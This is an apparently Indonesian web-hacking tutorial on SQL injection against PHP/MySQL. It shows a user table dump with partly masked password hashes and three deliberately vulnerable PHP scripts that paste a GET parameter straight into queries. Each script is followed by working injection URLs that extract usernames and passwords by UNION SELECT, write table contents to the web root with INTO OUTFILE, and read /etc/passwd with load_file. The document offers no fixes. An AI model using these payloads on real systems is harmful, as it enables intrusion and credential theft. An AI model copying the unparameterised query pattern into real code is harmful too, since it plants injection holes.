-== WEB HACKING IN ACTION PART I==-


PHP - MYSQL : SQL INJECTION
----------------------------

(Dumping MySQL Database)

CREATE TABLE `userlist` (
  `id` tinyint(6) NOT NULL auto_increment,
  `username` varchar(28) NOT NULL,
  `status` varchar(28) NOT NULL,
  `password` varchar(48) NOT NULL,
  `creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  `nama_lengkap` varchar(128) NOT NULL,
  `status_id` tinyint(6) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;

-- 
-- Dumping data for table `userlist`
-- 

INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES 
(1, 'anxx', 'administrator', '8a1465884c097cfa30e332c57exxxxxx', '2007-05-15 21:18:08', 'anxxx nightlogin', 1),
(2, 'kaxxxx', 'operator', '8a1465884c097cfa30e332c57xxxxxx', '2007-05-04 21:18:31', 'kaxxxx poseidon', 2),
(3, 'bxxx', 'operator', 'b3f85374ebbdb228c0ad76cd6axxxxxx', '2007-05-04 16:51:32', 'Bxxx Erlangga', 2),
(4, 'haxxx', 'operator', 'daa526517139536f056efbb8exxxxxx', '2007-05-04 20:13:31', 'Haxxx pekok', 2);

#############
# SEKENARIO 1
#############

<?php
$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
        die("Error ndan!!");
}

$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE id='$dbid'";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
        die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."<br>";
echo "Username : ".$row->username."<br>";
echo "Status :".$row->status."<br>";
echo "\n";

?>


Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2' and 'a'='a 
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2' union select 1,1,1,1,1,1,1/* 
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1'%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2'%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1'%20union%20select%201,1,1,1,1,1,load_file('/etc/passwd')%20into%20outfile%20'/var/www/users/kaiten/PENTEST/pwdx.txt'/*


#############
# SEKENARIO 2
#############

<?php
$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
        die("Error ndan!!");
}

$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE id=$dbid";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
        die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."<br>";
echo "Username : ".$row->username."<br>";
echo "Status :".$row->status."<br>";
echo "\n";
?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0 
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1 
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt'
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file('/etc/passwd')%20into%20outfile%20'/var/www/users/kaiten/PENTEST/pwd.txt'


#############
# SEKENARIO 3
#############

<?php
$host="localhost";
$user="xx";
$passwd="xxx";
$dbname="e-register";
if(!isset($_GET['id']) OR empty($_GET['id']))
{
        die("Error ndan!!");
}

$dbid=$_GET['id'];
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
mysql_select_db($dbname,$conid) or die(mysql_error());
$query="SELECT * FROM userlist WHERE (id='$dbid')";
$res=mysql_query($query) or die(mysql_error());
$row=mysql_fetch_object($res);
if(!$row){
        die(mysql_error());
}
echo "Nama : ".$row->nama_lengkap."<br>";
echo "Username : ".$row->username."<br>";
echo "Status :".$row->status."<br>";
echo "\n";

?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1')%20and%201=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2') union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1')%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2')%20union%20select%20*%20from%20userlist%20into%20outfile%20'/var/www/users/kaiten/PENTEST/db.txt'/*

Note : 
/var/www/users/kaiten/PENTEST/ is world writeable (permission 777)
magic_quotes_gpc = Off
I'a really lamme in SQL injection :((
Author : Ph03n1X
URL : http://kandangjamur.net